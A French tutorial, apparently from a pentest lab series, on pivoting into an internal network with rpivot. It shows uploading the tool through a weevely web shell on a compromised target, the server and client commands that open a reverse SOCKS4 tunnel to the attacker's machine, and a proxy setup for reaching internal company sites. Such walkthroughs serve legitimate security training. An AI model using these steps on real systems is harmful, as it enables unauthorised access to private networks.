Pivot 4
Installation python et rpivot
Dans cette partie nous allons utiliser un proxy SOCKS4 grâce à l’utilisation de rpivot.
Tout d’abord aller sur votre navigateur et chercher rpivot, vous devriez avoir en premier lien le repot github
Récupérer le lien pour le télecharger
Cloner le dans vos documents
Pour sa bonne utilisation vous devez installer Python2.7
Phase d’upload
Pour réaliser notre connexion nous avons besoin d’uploader sur le site notre dossier rpivot, pour cela nous l’avons compressé avec :
tar czvf rpivot.tar.gz rpivot
Et nous l’avons ensuite upload sur le site
Grâce a notre weevely nous nous connectons à la machine cible
Nous voulons ensuite décompresser notre fichier precdemment envoyé, pour cela weevely à la commande :file_gzip
Nous devons maintenant décompresser le tar grâce à la commande :file_tar
Tous nos fichiers ont bien été uploadés !
Connexion
Nous pouvons donc lancer le serveur sur notre machine
python2.7 server.py --server-port your_port_server --server-ip your_ip --proxy-ip ip_proxy --proxy-port port_proxy
Sur notre machine cible, nous pouvons nous connecter à notre serveur
python2.7 client.py --server-ip your_ip --server-port your_port_server
Sur votre machine vous devez voir une connexion appraître
FoxyProxy
Nous pouvons donc ajouter un proxy sur notre extension FoxyProxy avec comme informations :
- Title : Pivot4-Rpivot
- Proxy Type : SOCKS4
- Proxy IP : localhost or 127.0.0.1
- Port : 8081
Vous y connecter et ainsi accèder aux sites internes à l’entreprise
Proxychains
Vous pouvez aussi ajouter votre nouvelle configuration dans votre fichier proychains
Les résultats sont disponibles et étudiés ici